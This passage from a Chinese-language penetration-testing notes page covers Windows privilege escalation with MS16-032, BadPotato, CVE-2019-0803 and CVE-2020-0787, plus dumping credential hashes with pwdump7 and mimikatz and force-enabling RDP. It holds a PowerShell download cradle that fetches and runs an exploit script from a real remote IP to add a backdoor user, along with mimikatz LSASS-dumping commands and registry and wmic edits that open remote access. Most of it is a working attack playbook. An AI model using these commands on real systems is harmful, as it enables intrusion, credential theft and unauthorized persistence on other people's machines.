                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596166663037-e40046b4-b8b9-4e95-a672-7b79a10c4806.png#align=left&display=inline&height=414&margin=%5Bobject%20Object%5D&name=image.png&originHeight=827&originWidth=1543&size=290531&status=done&style=none&width=771.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h2 id="提权完成标志"><a href="#提权完成标志" class="headerlink" title="提权完成标志"></a>提权完成标志</h2><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596607756437-39ba810f-575a-4c48-b6a2-e4483dc9f953.png#align=left&display=inline&height=414&margin=%5Bobject%20Object%5D&name=image.png&originHeight=827&originWidth=1542&size=272848&status=done&style=none&width=771" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h1 id="MSF-提权"><a href="#MSF-提权" class="headerlink" title="MSF 提权"></a>MSF 提权</h1><h1 id="常规提权"><a href="#常规提权" class="headerlink" title="常规提权"></a>常规提权</h1><h2 id="CVE-2019-0803CVE-2019-0803-zip"><a href="#CVE-2019-0803CVE-2019-0803-zip" class="headerlink" title="CVE-2019-0803CVE-2019-0803.zip"></a>CVE-2019-0803<a href="https://www.yuque.com/attachments/yuque/0/2020/zip/258143/1596725365243-0e40e977-81fb-4120-bb58-241964f6b17a.zip?_lake_card=%7B%22uid%22%3A%221595957736015-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fzip%2F258143%2F1596725365243-0e40e977-81fb-4120-bb58-241964f6b17a.zip%22%2C%22name%22%3A%22CVE-2019-0803.zip%22%2C%22size%22%3A419444%2C%22type%22%3A%22application%2Fx-zip-compressed%22%2C%22ext%22%3A%22zip%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%22kpcdq%22%2C%22card%22%3A%22file%22%7D">CVE-2019-0803.zip</a></h2><p>1、查看一下当前用户发现是普通用户无法建立新的用户。</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596000779952-4cd72eaa-5b05-4eb8-be46-d00f0b1beb26.png#align=left&display=inline&height=147&margin=%5Bobject%20Object%5D&name=image.png&originHeight=294&originWidth=768&size=150643&status=done&style=none&width=384" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>2、把上传的 CVE-2019-0803 拖进 cmd 里，创建新用户 zz</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596000890644-6078e18e-ef93-4d8d-9824-603238f194b9.png#align=left&display=inline&height=398&margin=%5Bobject%20Object%5D&name=image.png&originHeight=796&originWidth=686&size=442463&status=done&style=none&width=343" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h2 id="CVE-2020-0787BitsArbitraryFileMoveExploit-zip"><a href="#CVE-2020-0787BitsArbitraryFileMoveExploit-zip" class="headerlink" title="CVE-2020-0787BitsArbitraryFileMoveExploit.zip"></a><a href="https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION/releases" target="_blank" rel="noopener">CVE-2020-0787</a><a href="https://www.yuque.com/attachments/yuque/0/2020/zip/258143/1596725365369-9ac6e696-ee40-4429-a7af-dcff5d8498de.zip?_lake_card=%7B%22uid%22%3A%221596000370507-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fzip%2F258143%2F1596725365369-9ac6e696-ee40-4429-a7af-dcff5d8498de.zip%22%2C%22name%22%3A%22BitsArbitraryFileMoveExploit.zip%22%2C%22size%22%3A241372%2C%22type%22%3A%22application%2Fx-zip-compressed%22%2C%22ext%22%3A%22zip%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%22ezOv8%22%2C%22card%22%3A%22file%22%7D">BitsArbitraryFileMoveExploit.zip</a></h2><p>1、创建一个普通用户 net user test test123.. /add 并登入</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596000469388-84118202-63c8-4b65-9ce5-04dadf7a83d9.png#align=left&display=inline&height=214&margin=%5Bobject%20Object%5D&name=image.png&originHeight=429&originWidth=837&size=302009&status=done&style=none&width=418.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>查看当前用户为 test 并上传 exe 运行</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596000424542-fc3ea812-cffd-42e3-916e-df3a180d6d28.png#align=left&display=inline&height=224&margin=%5Bobject%20Object%5D&name=image.png&originHeight=448&originWidth=843&size=290122&status=done&style=none&width=421.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h2 id="ms16-32-还未测试-Invoke-MS16-032-ps1"><a href="#ms16-32-还未测试-Invoke-MS16-032-ps1" class="headerlink" title="MS16-032(还未测试)Invoke-MS16-032.ps1"></a>MS16-032(还未测试)<a href="https://www.yuque.com/attachments/yuque/0/2020/ps1/258143/1596725365474-d1a3053e-a5f6-4dd5-b550-c6ba77af084b.ps1?_lake_card=%7B%22uid%22%3A%221596011138011-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fps1%2F258143%2F1596725365474-d1a3053e-a5f6-4dd5-b550-c6ba77af084b.ps1%22%2C%22name%22%3A%22Invoke-MS16-032.ps1%22%2C%22size%22%3A15291%2C%22type%22%3A%22%22%2C%22ext%22%3A%22ps1%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%22r2T9i%22%2C%22card%22%3A%22file%22%7D">Invoke-MS16-032.ps1</a></h2><h4 id="本地提权"><a href="#本地提权" class="headerlink" title="本地提权"></a>本地提权</h4><p>Invoke-MS16-032.ps1 只是定义了 Invoke-MS16-032 函数，直接以 .ps1 加参数运行不会生效；需要先把脚本加载进当前会话（点号加载或 Import-Module），再调用函数，与下面远程加载的写法一致：</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">powershell</span><br><span class="line">. .\Invoke-MS16-032.ps1</span><br><span class="line"><span class="built_in">Invoke-MS16</span><span class="literal">-032</span> <span class="literal">-Application</span> cmd.exe <span class="literal">-commandline</span> <span class="string">"/c net user evi1cg test123 /add"</span></span><br></pre></td></tr></table></figure>

<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/gif/258143/1596009266490-76f7778a-1f4f-47e3-b0d0-93b12565bb24.gif#align=left&display=inline&height=650&margin=%5Bobject%20Object%5D&name=356325576.gif&originHeight=650&originWidth=979&size=670606&status=done&style=none&width=979" alt="356325576.gif" title="">
                </div>
                <div class="image-caption">356325576.gif</div>
            </figure>

<h4 id="远程给加载提权"><a href="#远程给加载提权" class="headerlink" title="远程加载提权"></a>远程加载提权</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell <span class="literal">-nop</span> <span class="literal">-exec</span> bypass <span class="literal">-c</span> <span class="string">"IEX (New-Object Net.WebClient).DownloadString('http://122.51.93.116/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user evi1cg test123 /add'"</span></span><br></pre></td></tr></table></figure>
<p>注意：主机名和文件名之间必须有 <code>/</code>（<code>http://主机/Invoke-MS16-032.ps1</code>），否则 URL 无法解析。脚本通过明文 HTTP 下载后直接 IEX 执行，链路上任何人都可以替换脚本内容，应使用自己控制的 HTTPS 服务器分发；同时 <code>-nop -exec bypass</code> 加 <code>IEX (New-Object Net.WebClient).DownloadString</code> 是 AMSI/EDR 常见的检测特征，在有防护的目标上很可能被拦截并产生告警。</p>

<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/gif/258143/1596010859066-bacecdf1-6edb-4583-b67c-679a78109ab8.gif#align=left&display=inline&height=650&margin=%5Bobject%20Object%5D&name=2.gif&originHeight=650&originWidth=979&size=782929&status=done&style=none&width=979" alt="2.gif" title="">
                </div>
                <div class="image-caption">2.gif</div>
            </figure>

<h2 id="dazzleUP（漏洞检测）dazzleUP-zip"><a href="#dazzleUP（漏洞检测）dazzleUP-zip" class="headerlink" title="dazzleUP（漏洞检测）dazzleUP.zip"></a>dazzleUP（漏洞检测）<a href="https://www.yuque.com/attachments/yuque/0/2020/zip/258143/1596725365591-daced9d9-ef39-4497-9415-d455b1cd84cb.zip?_lake_card=%7B%22uid%22%3A%221596093918251-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fzip%2F258143%2F1596725365591-daced9d9-ef39-4497-9415-d455b1cd84cb.zip%22%2C%22name%22%3A%22dazzleUP.zip%22%2C%22size%22%3A512950%2C%22type%22%3A%22application%2Fx-zip-compressed%22%2C%22ext%22%3A%22zip%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%22tIZCl%22%2C%22card%22%3A%22file%22%7D">dazzleUP.zip</a></h2><p>适用：win 10</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">DCOM&#x2F;NTLM Reflection (Rotten&#x2F;Juicy Potato) Vulnerability</span><br><span class="line">CVE-2019-0836</span><br><span class="line">CVE-2019-0841</span><br><span class="line">CVE-2019-1064</span><br><span class="line">CVE-2019-1130</span><br><span class="line">CVE-2019-1253</span><br><span class="line">CVE-2019-1385</span><br><span class="line">CVE-2019-1388</span><br><span class="line">CVE-2019-1405</span><br><span class="line">CVE-2019-1315</span><br><span class="line">CVE-2020-0787</span><br><span class="line">CVE-2020-0796</span><br></pre></td></tr></table></figure>

<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596093953631-d24a84b5-576c-46f2-aeb2-f5438eb9286d.png#align=left&display=inline&height=271&margin=%5Bobject%20Object%5D&name=image.png&originHeight=542&originWidth=1199&size=340191&status=done&style=none&width=599.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h2 id="BadPotato-提权Release-zip"><a href="#BadPotato-提权Release-zip" class="headerlink" title="BadPotato 提权Release.zip"></a>BadPotato 提权<a href="https://www.yuque.com/attachments/yuque/0/2020/zip/258143/1596725365769-d757d901-a232-4942-b54f-c495a0e89fe5.zip?_lake_card=%7B%22uid%22%3A%221596109729829-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fzip%2F258143%2F1596725365769-d757d901-a232-4942-b54f-c495a0e89fe5.zip%22%2C%22name%22%3A%22Release.zip%22%2C%22size%22%3A48177%2C%22type%22%3A%22application%2Fx-zip-compressed%22%2C%22ext%22%3A%22zip%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%229jImj%22%2C%22card%22%3A%22file%22%7D">Release.zip</a></h2><p>适用：Windows 2012-2019<br>Windows 8-10<br>注意：命令中含有空格时需要用英文双引号 "" 括起来；此工具为 .NET 版本，在蚁剑和 cs 上提权成功。BadPotato 属于 Potato 系列，前提是当前令牌拥有 SeImpersonatePrivilege（典型为 IIS/MSSQL 等服务账户的上下文），使用前先用 <code>whoami /priv</code> 确认，没有该权限时不会成功。</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596110356894-42232318-6562-45fd-9eb2-4633ed105948.png#align=left&display=inline&height=56&margin=%5Bobject%20Object%5D&name=image.png&originHeight=112&originWidth=744&size=9918&status=done&style=none&width=372" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596110176792-e82ae15d-5951-40e8-a6f1-b88ee2ab5f60.png#align=left&display=inline&height=360&margin=%5Bobject%20Object%5D&name=image.png&originHeight=720&originWidth=710&size=60918&status=done&style=none&width=355" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596110263454-a6d437d7-0b13-4f4f-8a18-c33e1ae1f2a9.png#align=left&display=inline&height=362&margin=%5Bobject%20Object%5D&name=image.png&originHeight=723&originWidth=699&size=59230&status=done&style=none&width=349.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h1 id="提权查询"><a href="#提权查询" class="headerlink" title="提权查询"></a><a href="http://blog.neargle.com/win-powerup-exp-index/" target="_blank" rel="noopener">提权查询</a></h1><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596000569316-64cbe683-6fb9-41eb-bb90-8196371282ef.png#align=left&display=inline&height=368&margin=%5Bobject%20Object%5D&name=image.png&originHeight=736&originWidth=1388&size=99563&status=done&style=none&width=694" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h1 id="Hash-读取（管理员权限）"><a href="#Hash-读取（管理员权限）" class="headerlink" title="Hash 读取（管理员权限）"></a><a href="https://mp.weixin.qq.com/s?__biz=MjM5NDUxMTI2NA==&amp;mid=2247484303&idx=1&sn=7733981a64299e061e495c98abe0370c&chksm=a687e34091f06a56da8c5a380a7a61b927bedc2300271aeea1c064b7bd4be75818d191c6f3f9&mpshare=1&scene=24&srcid=0804C7EJbROG2ZUgUqGMQH2x&sharer_sharetime=1596530942381&sharer_shareid=f082bd6e4afa0b021ff0cb8b0db46ed5&key=f87c13d2d4a2ca88180b96a094832ce7d6f09d526d33fa2b7db6ae9aa2482d922bb769db71edce5e5100f2c1d140355b7516cb0fd6ee8e40a18382eca5de2fdab676c9b5ac1de1609409d462aeedd71b&ascene=14&uin=OTc1NzE1Nzgw&devicetype=Windows+10+x64&version=6209007b&amp;lang=zh_CN&exportkey=AxcDvN201rC9YrYyTiygSJE%3D&pass_ticket=Y88jPb%2BZ9uYCDXH78uMnNPj38c%2FKJPNlJoqwvp3IaMSZTV2j0PbBjShPOJ9GGbP4" target="_blank" rel="noopener">Hash 读取</a>（管理员权限）</h1><h2 id="使用-pwdump7-获取-hash"><a href="#使用-pwdump7-获取-hash" class="headerlink" title="使用 pwdump7 获取 hash"></a><strong>使用 pwdump7 获取 hash</strong></h2><h4 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h4><h4 id="hash-读取Pwdump7-zip"><a href="#hash-读取Pwdump7-zip" class="headerlink" title="hash 读取Pwdump7.zip"></a>hash 读取<a href="https://www.yuque.com/attachments/yuque/0/2020/zip/258143/1596725365891-1d0cf28f-223c-4720-b94f-269ca6e38313.zip?_lake_card=%7B%22uid%22%3A%221596604336670-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fzip%2F258143%2F1596725365891-1d0cf28f-223c-4720-b94f-269ca6e38313.zip%22%2C%22name%22%3A%22Pwdump7.zip%22%2C%22size%22%3A768486%2C%22type%22%3A%22application%2Fx-zip-compressed%22%2C%22ext%22%3A%22zip%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%225B65j%22%2C%22card%22%3A%22file%22%7D">Pwdump7.zip</a></h4><p><strong>测试环境：Win7、Win03、Win08</strong><br>1、将整个附件解压上传到靶机，否则会报错（一般是因为 pwdump7 依赖同目录下的 DLL，只上传 exe 会因找不到依赖而失败；读取 SAM 需要管理员/SYSTEM 权限）。</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596604208017-b970f6a2-9ea9-4151-b062-2babcf0194f5.png#align=left&display=inline&height=111&margin=%5Bobject%20Object%5D&name=image.png&originHeight=222&originWidth=630&size=69607&status=done&style=none&width=315" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596604183676-7189191c-7610-4946-99f6-87fab6ff5350.png#align=left&display=inline&height=101&margin=%5Bobject%20Object%5D&name=image.png&originHeight=201&originWidth=771&size=23007&status=done&style=none&width=386" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>执行 pwdump.exe，读取成功<br>win7</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596605167992-81ee5259-2054-47d2-80c9-b7f93992ccf3.png#align=left&display=inline&height=145&margin=%5Bobject%20Object%5D&name=image.png&originHeight=290&originWidth=723&size=31801&status=done&style=none&width=361.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>Windows2008：<br>Windows2003：</p>
<h4 id="拿到-hash-直接破解："><a href="#拿到-hash-直接破解：" class="headerlink" title="拿到 hash 直接破解："></a><a href="https://www.cmd5.com/" target="_blank" rel="noopener">拿到 hash 直接破解</a>：</h4><p>注意：把目标环境的 NTLM hash 提交到第三方在线查询站点，等于把客户凭据交给了外部平台，正式授权项目中应使用 hashcat/john 离线破解；另外 NTLM hash 本身即可用于 pass-the-hash 登录，并不一定需要还原出明文。</p><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596605194766-0e11828f-9540-42c4-bf4a-18a496b21141.png#align=left&display=inline&height=131&margin=%5Bobject%20Object%5D&name=image.png&originHeight=261&originWidth=825&size=13034&status=done&style=none&width=412.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h2 id="mimikatz-抓取-hash"><a href="#mimikatz-抓取-hash" class="headerlink" title="mimikatz 抓取 hash"></a><strong>mimikatz 抓取 hash</strong></h2><h4 id="执行命令mimikatz-trunk-zip"><a href="#执行命令mimikatz-trunk-zip" class="headerlink" title="执行命令mimikatz_trunk.zip"></a>执行命令<a href="https://www.yuque.com/attachments/yuque/0/2020/zip/258143/1596877575881-7e6e65c8-7a2b-4817-8c3a-1daad6ec1549.zip?_lake_card=%7B%22uid%22%3A%221596877574622-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fzip%2F258143%2F1596877575881-7e6e65c8-7a2b-4817-8c3a-1daad6ec1549.zip%22%2C%22name%22%3A%22mimikatz_trunk.zip%22%2C%22size%22%3A1135477%2C%22type%22%3A%22application%2Fx-zip-compressed%22%2C%22ext%22%3A%22zip%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%2260MmQ%22%2C%22card%22%3A%22file%22%7D">mimikatz_trunk.zip</a></h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">mimikatz.exe</span><br><span class="line"></span><br><span class="line">#申请 SeDebugPrivilege（需管理员权限），返回 Privilege '20' OK 才能继续后面的命令</span><br><span class="line">privilege::debug</span><br><span class="line"></span><br><span class="line">#抓取hash</span><br><span class="line">#从 LSASS 内存读取当前登录用户的凭据；明文密码依赖 WDigest 缓存，Win8.1/2012R2 起或打了 KB2871997 的系统默认只能拿到 NTLM hash</span><br><span class="line">sekurlsa::logonpasswords</span><br><span class="line"></span><br><span class="line">#从 LSA/SAM 导出本机账户的 NTLM hash（在域控上导出的是域账户）</span><br><span class="line">lsadump::lsa /patch</span><br></pre></td></tr></table></figure>

<p><strong>权限符合则提示</strong></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596891469135-620967c1-d803-4872-ae43-cfeaff5e3f6a.png#align=left&display=inline&height=133&margin=%5Bobject%20Object%5D&name=image.png&originHeight=265&originWidth=801&size=20220&status=done&style=none&width=400.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p><strong>测试：win7 环境下</strong></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596877277818-50b18d70-8d61-4439-9ffa-16db6fe5308d.png#align=left&display=inline&height=307&margin=%5Bobject%20Object%5D&name=image.png&originHeight=614&originWidth=838&size=41359&status=done&style=none&width=419" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596877444914-f56ff8e1-37bb-4625-86be-75a323e50316.png#align=left&display=inline&height=359&margin=%5Bobject%20Object%5D&name=image.png&originHeight=718&originWidth=781&size=37748&status=done&style=none&width=390.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>Windows 2008 用 GetPassword.exe <a href="https://www.yuque.com/attachments/yuque/0/2020/zip/258143/1596878142955-6c57f92b-4af2-4fa3-907b-7a9caf951d90.zip?_lake_card=%7B%22uid%22%3A%221596878142457-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fzip%2F258143%2F1596878142955-6c57f92b-4af2-4fa3-907b-7a9caf951d90.zip%22%2C%22name%22%3A%22GetPass.zip%22%2C%22size%22%3A176299%2C%22type%22%3A%22application%2Fx-zip-compressed%22%2C%22ext%22%3A%22zip%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%22EJKDj%22%2C%22card%22%3A%22file%22%7D">GetPass.zip</a></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596878161275-a41963ad-fce9-4c76-aea7-0be5c57ebc31.png#align=left&display=inline&height=153&margin=%5Bobject%20Object%5D&name=image.png&originHeight=305&originWidth=1055&size=88821&status=done&style=none&width=527.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h4 id="如果权限不足则会提示"><a href="#如果权限不足则会提示" class="headerlink" title="如果权限不足则会提示"></a>如果权限不足则会提示</h4><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596877960841-32d91383-e94e-4bae-a735-8643a3d32347.png#align=left&display=inline&height=78&margin=%5Bobject%20Object%5D&name=image.png&originHeight=156&originWidth=618&size=10573&status=done&style=none&width=309" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h2 id="MSF-抓取-hash"><a href="#MSF-抓取-hash" class="headerlink" title="MSF 抓取 hash"></a>MSF 抓取 hash</h2><h2 id="Cobalt-Strike-抓取-hash"><a href="#Cobalt-Strike-抓取-hash" class="headerlink" title="Cobalt Strike 抓取 hash"></a>Cobalt Strike 抓取 hash</h2><h4 id="1、抓取-hash（通过-cobalt-strike）"><a href="#1、抓取-hash（通过-cobalt-strike）" class="headerlink" title="1、抓取 hash（通过 cobalt strike）"></a>1、抓取 hash（通过 cobalt strike）</h4><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596608521335-f990db60-acfd-4de2-97f9-17ca8ba2726e.png#align=left&display=inline&height=332&margin=%5Bobject%20Object%5D&name=image.png&originHeight=664&originWidth=1920&size=59020&status=done&style=none&width=960" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h1 id="端口转发"><a href="#端口转发" class="headerlink" title="端口转发"></a>端口转发</h1><h2 id="MSF-端口转发"><a href="#MSF-端口转发" class="headerlink" title="MSF 端口转发"></a>MSF 端口转发</h2><h2 id="ew"><a href="#ew" class="headerlink" title="ew"></a>ew</h2><h2 id="常见问题解决办法"><a href="#常见问题解决办法" class="headerlink" title="常见问题解决办法"></a>常见问题解决办法</h2><h4 id="服务端口默认被修改"><a href="#服务端口默认被修改" class="headerlink" title="服务端口默认被修改"></a>RDP 默认端口（3389）被修改</h4><p>解决办法 ①：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">#先用 tasklist /svc 找到承载 TermService 的进程 PID，再用 netstat 查该 PID 监听的端口</span><br><span class="line">tasklist /svc</span><br><span class="line">netstat -ano | findstr &lt;PID&gt;</span><br></pre></td></tr></table></figure>

<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596609640544-3e20638a-338e-4161-84e1-0c102c3b9d45.png#align=left&display=inline&height=274&margin=%5Bobject%20Object%5D&name=image.png&originHeight=547&originWidth=1059&size=186262&status=done&style=none&width=529.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>解决办法 ②：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">#读取注册表查询终端端口PortNumber的值</span><br><span class="line">REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal&quot; &quot;Server\WinStations\RDP-Tcp &#x2F;v PortNumber</span><br></pre></td></tr></table></figure>

<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596609726168-d450dd2b-e970-4422-9897-e48176916f36.png#align=left&display=inline&height=144&margin=%5Bobject%20Object%5D&name=image.png&originHeight=144&originWidth=1054&size=32038&status=done&style=none&width=1054" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>备注：0xd3d=hex(3389)</p>
<p>解决办法 ③：nmap 探测(ms-wbt-server 服务)</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596609782138-e97f2179-d252-4a8f-a460-d384e1e6f469.png#align=left&display=inline&height=303&margin=%5Bobject%20Object%5D&name=image.png&originHeight=303&originWidth=1059&size=147309&status=done&style=none&width=1059" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h4 id="服务器未开启-3389"><a href="#服务器未开启-3389" class="headerlink" title="服务器未开启 3389"></a>服务器未开启 3389</h4><p>解决办法：强开 3389。注意这是对目标配置的改动，会扩大目标的暴露面（下面的 setuserauthenticationrequired 1 还会强制开启 NLA），作业结束后应恢复原值并在报告中记录。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">#通用开3389：</span><br><span class="line">wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1</span><br><span class="line"></span><br><span class="line">#For Win2003&amp;Win2008:</span><br><span class="line">REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f</span><br><span class="line"></span><br><span class="line">#win2012/win08通用；win7前两条适用。winxp/win03未测验。需要以管理员权限运行（命名空间是 \\root\cimv2\terminalservices，复制时注意 \t 不要被当成制表符）:</span><br><span class="line">wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1</span><br><span class="line">wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1</span><br><span class="line">reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f</span><br></pre></td></tr></table></figure>

